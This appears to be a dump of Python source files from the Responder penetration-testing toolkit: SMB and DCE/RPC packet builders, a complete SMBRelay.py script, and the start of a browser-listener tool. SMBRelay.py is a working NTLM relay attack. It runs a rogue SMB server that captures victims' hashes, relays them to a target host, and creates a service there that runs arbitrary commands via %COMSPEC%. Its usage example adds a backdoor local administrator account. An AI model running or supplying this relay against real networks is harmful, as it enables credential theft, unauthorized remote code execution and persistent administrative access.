("AnsiPasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
("UnicodePasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
("Username","Administrator"),
("UsernameTerminator","\x00\x00"),
("Domain","SMB"),
("DomainTerminator","\x00\x00"),
("Nativeos",""),
("NativeosTerminator","\x00\x00"),
("Lanmanager",""),
("LanmanagerTerminator","\x00\x00\x00"),
("Wordcount2","\x04"),
("Andxcmd2","\xff"),
("Reserved3","\x00"),
("Andxoffset2","\x06\x01"),
("Flags","\x08\x00"),
("PasswordLength","\x01\x00"),
("Bcc2","\x19\x00"),
("Passwd","\x00"),
("PrePath","\\\\"),
("Targ", "CSCDSFCS"),
("IPC", "\\IPC$"),
("TerminatorPath","\x00\x00"),
("Service","?????"),
("TerminatorService","\x00"),
])
def calculate(self):
##Convert first
self.fields["Username"] = self.fields["Username"].encode('utf-16be')
self.fields["Domain"] = self.fields["Domain"].encode('utf-16be')
self.fields["Nativeos"] = self.fields["Nativeos"].encode('utf-16be')
self.fields["Lanmanager"] = self.fields["Lanmanager"].encode('utf-16be')
self.fields["PrePath"] = self.fields["PrePath"].encode('utf-16le')
self.fields["Targ"] = self.fields["Targ"].encode('utf-16le')
self.fields["IPC"] = self.fields["IPC"].encode('utf-16le')
##Then calculate
data1= str(self.fields["AnsiPasswd"])+(self.fields["UnicodePasswd"])+str(self.fields["Username"])+str(self.fields["UsernameTerminator"])+str(self.fields["Domain"])+str(self.fields["DomainTerminator"])+str(self.fields["Nativeos"])+str(self.fields["NativeosTerminator"])+str(self.fields["Lanmanager"])+str(self.fields["LanmanagerTerminator"])
data2= str(self.fields["Passwd"])+str(self.fields["PrePath"])+str(self.fields["Targ"])+str(self.fields["IPC"])+str(self.fields["TerminatorPath"])+str(self.fields["Service"])+str(self.fields["TerminatorService"])
self.fields["Bcc"] = struct.pack("<h",len(data1))
self.fields["Bcc2"] = struct.pack("<h",len(data2))
self.fields["Andxoffset"] = struct.pack("<h",len(data1)+32+29)
self.fields["AnsiPassLength"] = struct.pack("<h",len(str(self.fields["AnsiPasswd"])))
self.fields["UnicodePassLength"] = struct.pack("<h",len(str(self.fields["UnicodePasswd"])))
self.fields["PasswordLength"] = struct.pack("<h",len(str(self.fields["Passwd"])))
class SMBNTCreateData(Packet):
fields = OrderedDict([
("Wordcount", "\x18"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\x00\x00"),
("Reserved2", "\x00"),
("FileNameLen", "\x07\x00"),
("CreateFlags", "\x16\x00\x00\x00"),
("RootFID", "\x00\x00\x00\x00"),
("AccessMask", "\x00\x00\x00\x02"),
("AllocSize", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("FileAttrib", "\x00\x00\x00\x00"),
("ShareAccess", "\x07\x00\x00\x00"),
("Disposition", "\x01\x00\x00\x00"),
("CreateOptions", "\x00\x00\x00\x00"),
("Impersonation", "\x02\x00\x00\x00"),
("SecurityFlags", "\x00"),
("Bcc", "\x08\x00"),
("FileName", "\\svcctl"),
("FileNameNull", "\x00"),
])
def calculate(self):
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
self.fields["Bcc"] = struct.pack("<h",len(Data1))
class SMBReadData(Packet):
fields = OrderedDict([
("Wordcount", "\x0a"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\x00\x00"),
("FID", "\x00\x00"),
("Offset", "\x19\x03\x00\x00"),
("MaxCountLow", "\xed\x01"),
("MinCount", "\xed\x01"),
("Hidden", "\xff\xff\xff\xff"),
("Remaining", "\x00\x00"),
("Bcc", "\x00\x00"),
("Data", ""),
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBWriteData(Packet):
fields = OrderedDict([
("Wordcount", "\x0e"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\x00\x00"),
("FID", "\x06\x40"),
("Offset", "\xea\x03\x00\x00"),
("Reserved2", "\xff\xff\xff\xff"),
("WriteMode", "\x08\x00"),
("Remaining", "\xdc\x02"),
("DataLenHi", "\x00\x00"),
("DataLenLow", "\xdc\x02"),
("DataOffset", "\x3f\x00"),
("HiOffset", "\x00\x00\x00\x00"),
("Bcc", "\xdc\x02"),
("Data", ""),
])
def calculate(self):
self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBDCEData(Packet):
fields = OrderedDict([
("Version", "\x05"),
("VersionLow", "\x00"),
("PacketType", "\x0b"),
("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"),
("AuthLen", "\x00\x00"),
("CallID", "\x00\x00\x00\x00"),
("MaxTransFrag", "\xd0\x16"),
("MaxRecvFrag", "\xd0\x16"),
("GroupAssoc", "\x00\x00\x00\x00"),
("CTXNumber", "\x01"),
("CTXPadding", "\x00\x00\x00"),
("CTX0ContextID", "\x00\x00"),
("CTX0ItemNumber", "\x01\x00"),
("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
("CTX0UIDVersion", "\x02\x00"),
("CTX0UIDVersionlo","\x00\x00"),
("CTX0UIDSyntax", "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
])
def calculate(self):
Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
self.fields["FragLen"] = struct.pack("<h",len(Data1))
class SMBDCEPacketData(Packet):
fields = OrderedDict([
("Version", "\x05"),
("VersionLow", "\x00"),
("PacketType", "\x00"),
("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"),
("AuthLen", "\x00\x00"),
("CallID", "\x00\x00\x00\x00"),
("AllocHint", "\x38\x00\x00\x00"),
("ContextID", "\x00\x00"),
("Opnum", "\x0f\x00"),
("Data", ""),
])
def calculate(self):
Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
self.fields["FragLen"] = struct.pack("<h",len(Data1))
self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
class SMBDCESVCCTLOpenManagerW(Packet):
fields = OrderedDict([
("MachineNameRefID", "\xb5\x97\xb9\xbc"),
("MaxCount", "\x0f\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0f\x00\x00\x00"),
("MachineName", "\\\\169.220.1.11"),##This is not taken into consideration.
("MachineNameNull", "\x00\x00\x00\x00"),
("DbPointer", "\x00\x00\x00\x00"),
("AccessMask", "\x3f\x00\x0f\x00"),
])
def calculate(self):
## Convert to UTF-16LE
self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
class SMBDCESVCCTLCreateService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x0c\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", "AyAGaxwLhCP"),
("MachineNameNull", "\x00\x00"),
("ReferentID", "\x9c\xfa\x9a\xc9"),
("MaxCountRefID", "\x11\x00\x00\x00"),
("OffsetID", "\x00\x00\x00\x00"),
("ActualCountRefID", "\x11\x00\x00\x00"),
("DisplayNameID", "DhhUFcsvrfJvLwRq"),
("DisplayNameIDNull", "\x00\x00\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
("ServerType", "\x10\x01\x00\x00"),
("ServiceStartType", "\x03\x00\x00\x00"),
("ServiceErrorCtl", "\x00\x00\x00\x00"),
("BinPathMaxCount", "\xb6\x00\x00\x00"),
("BinPathOffset", "\x00\x00\x00\x00"),
("BinPathActualCount", "\xb6\x00\x00\x00"),
("BinPathName", "%COMSPEC% /C \""),
("BinCMD", ""),
("BintoEnd", "\""),
("BinPathNameNull", "\x00\x00"),
("Nullz", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
])
def calculate(self):
BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
## Calculate first
self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
## Then convert to UTF-16LE, yeah it's weird..
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
class SMBDCESVCCTLOpenService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x0c\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", ""),
("MachineNameNull", "\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
])
def calculate(self):
## Calculate first
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
## Then convert to UTF-16LE, yeah it's weird..
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
class SMBDCESVCCTLStartService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
])
def ParseAnswerKey(data,host):
key = data[73:81]
print "Key retrieved is:%s from host:%s"%(key.encode("hex"),host)
return key
| 15,323 | Python | .py | 308 | 42 | 649 | 0.558627 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,394 | SMBRelay.py | SpiderLabs_Responder/tools/SMBRelay.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import random
import optparse
import thread
sys.path.append('../')
from fingerprint import RunSmbFinger
from socket import *
from RelayPackets import *
from packets import *
from servers.SMB import *
from packets import Packet
import logging
Logs = logging
Logs.basicConfig(filemode="w",filename='SMBRelay-Session.txt',format='',level=logging.DEBUG)
def longueur(payload):
return struct.pack(">i", len(''.join(payload)))
def UserCallBack(op, value, dmy, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
if getattr(parser.values, op.dest):
args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin", prog=sys.argv[0],)
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="Responder_IP")
parser.add_option('-c',action='store', help='Command to run on the target.',metavar='"net user Responder Quol0eeP/e}X /ADD"',dest='CMD')
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
options, args = parser.parse_args()
if options.CMD is None:
print "\n-c mandatory option is missing, please provide a command to execute on the target.\n"
parser.print_help()
exit(-1)
elif options.TARGET is None:
print "\n-t mandatory option is missing, please provide a target.\n"
parser.print_help()
exit(-1)
elif options.UserToRelay is None:
print "\n-u mandatory option is missing, please provide a username to relay.\n"
parser.print_help()
exit(-1)
ResponderPATH = os.path.dirname(__file__)
UserToRelay = options.UserToRelay
Domain = options.Domain
Command = options.CMD
Target = options.TARGET
Responder_IP = options.Responder_IP
print "\nResponder SMBRelay 0.1\nPlease send bugs/comments to: laurent.gaffie@gmail.com"
print '\033[31m'+'Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..\nUsernames to relay (-u) are case sensitive.'+'\033[0m'
print 'To kill this script hit CRTL-C or Enter\nWill relay credentials for these users: '+'\033[1m\033[34m'+', '.join(UserToRelay)+'\033[0m\n'
#Function used to verify if a previous auth attempt was made.
def ReadData(outfile,Client, User, cmd=None):
try:
with open(ResponderPATH+outfile,"r") as filestr:
if cmd is None:
String = Client+':'+User
if re.search(String.encode('hex'), filestr.read().encode('hex')):
return True
return False
if cmd is not None:
String = Client+","+User+","+cmd
if re.search(String.encode('hex'), filestr.read().encode('hex')):
print "[+] Command: %s was previously executed on host: %s. Won't execute again.\n" %(cmd, Client)
return True
return False
except:
raise
#Function used to parse SMB NTLMv1/v2
def ParseHash(data,Client, Target):
try:
lenght = struct.unpack('<H',data[43:45])[0]
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
if NthashLen >= 30:
Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var)
if ReadData("SMBRelay-Session.txt", Client, Username):
print "[+]Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
if Username in UserToRelay:
print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
print "Username : ",Username
print "Domain (if joined, if not then computer name) : ",Domain
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
if NthashLen == 24:
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var)
if ReadData("SMBRelay-Session.txt", Client, Username):
print "Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
if Username in UserToRelay:
print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
LMHashing = data[65:65+LMhashLen].encode('hex').upper()
NTHashing = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
print "Username : ",Username
print "Domain (if joined, if not then computer name) : ",Domain
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
else:
print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s"%(Username,UserToRelay)
except Exception:
raise
#Detect if SMB auth was Anonymous
def Is_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
if LMhashLen == 0 or LMhashLen == 1:
print "SMB Anonymous login requested, trying to force client to auth with credz."
return True
return False
def ParseDomain(data):
return ''.join(data[81:].split('\x00\x00\x00')[:1])+'\x00\x00\x00'
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
DialectStart = data[40:]
pack = tuple(DialectStart.split('\x02'))[:10]
var = [e.replace('\x00','') for e in DialectStart.split('\x02')[:10]]
test = tuple(var)
if test[0] == "NT LM 0.12":
return "\x00\x00"
if test[1] == "NT LM 0.12":
return "\x01\x00"
if test[2] == "NT LM 0.12":
return "\x02\x00"
if test[3] == "NT LM 0.12":
return "\x03\x00"
if test[4] == "NT LM 0.12":
return "\x04\x00"
if test[5] == "NT LM 0.12":
return "\x05\x00"
if test[6] == "NT LM 0.12":
return "\x06\x00"
if test[7] == "NT LM 0.12":
return "\x07\x00"
if test[8] == "NT LM 0.12":
return "\x08\x00"
if test[9] == "NT LM 0.12":
return "\x09\x00"
if test[10] == "NT LM 0.12":
return "\x0a\x00"
def SmbRogueSrv139(key,Target,DomainMachineName):
s = socket(AF_INET,SOCK_STREAM)
s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
s.settimeout(30)
try:
s.bind(('0.0.0.0', 139))
s.listen(0)
conn, addr = s.accept()
except error, msg:
if "Address already in use" in msg:
print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
try:
while True:
data = conn.recv(1024)
##session request 139
if data[0] == "\x81":
buffer0 = "\x82\x00\x00\x00"
conn.send(buffer0)
##Negotiate proto answer.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
##Session Setup AndX Request
if data[8:10] == "\x73\x00":
if Is_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
packet1 = str(head)+str(SMBSessEmpty())
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
else:
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
buffer1 = longueur(packet1)+packet1
conn.send(buffer1)
Credz = ParseHash(data,addr[0],Target)
return Credz
except:
return None
def RunRelay(host, Command,Domain):
Target = host
CMD = Command
print "Target is running: ", RunSmbFinger((host, 445))
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, 445))
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
Key = ParseAnswerKey(data,host)
DomainMachineName = ParseDomain(data)
if data[8:10] == "\x72\x00":
try:
a = SmbRogueSrv139(Key,Target,DomainMachineName)
if a is not None:
LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
if Domain is None:
Domain = OriginalDomain
if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
pass
else:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
except:
raise
a = None
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
Logs.info(CLIENTIP+":"+Username)
if data[8:10] == "\x73\x0d":
print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
Logs.info(CLIENTIP+":"+Username)
## NtCreateAndx
if data[8:10] == "\x73\x00":
print "[+] Authenticated, trying to PSexec on target !"
head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBNTCreateData()
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## Fail Handling.
if data[8:10] == "\xa2\x22":
print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
## DCE/RPC Write.
if data[8:10] == "\xa2\x00":
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
x = SMBDCEData()
x.calculate()
f = data[42:44]
t = SMBWriteData(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLOpenManagerW.
if data[8:10] == "\x2e\x00":
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
t = SMBWriteData(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLCreateService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
print "[+] Creating service"
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
ContextHandler = data[88:108]
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service"
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service"
ContextHandler = data[88:108]
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x2e\x00":
print "[+] Command successful !"
Logs.info('Command successful:')
Logs.info(Target+","+Username+','+CMD)
return True
if data[8:10] != "\x2e\x00":
return False
def RunInloop(Target,Command,Domain):
try:
while True:
worker = RunRelay(Target,Command,Domain)
except:
raise
def main():
try:
thread.start_new(RunInloop,(Target,Command,Domain))
except KeyboardInterrupt:
exit()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
raise
raw_input()
| 21,375 | Python | .py | 398 | 39.085427 | 228 | 0.544743 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,395 | BrowserListener.py | SpiderLabs_Responder/tools/BrowserListener.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import thread
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
from threading import Lock
from utils import *
def ParseRoles(data):
if len(data) != 4:
return ''
AllRoles = {
'Workstation': (ord(data[0]) >> 0) & 1,
'Server': (ord(data[0]) >> 1) & 1,
'SQL': (ord(data[0]) >> 2) & 1,
'Domain Controller': (ord(data[0]) >> 3) & 1,
'Backup Controller': (ord(data[0]) >> 4) & 1,
'Time Source': (ord(data[0]) >> 5) & 1,
'Apple': (ord(data[0]) >> 6) & 1,
'Novell': (ord(data[0]) >> 7) & 1,
'Member': (ord(data[1]) >> 0) & 1,
'Print': (ord(data[1]) >> 1) & 1,
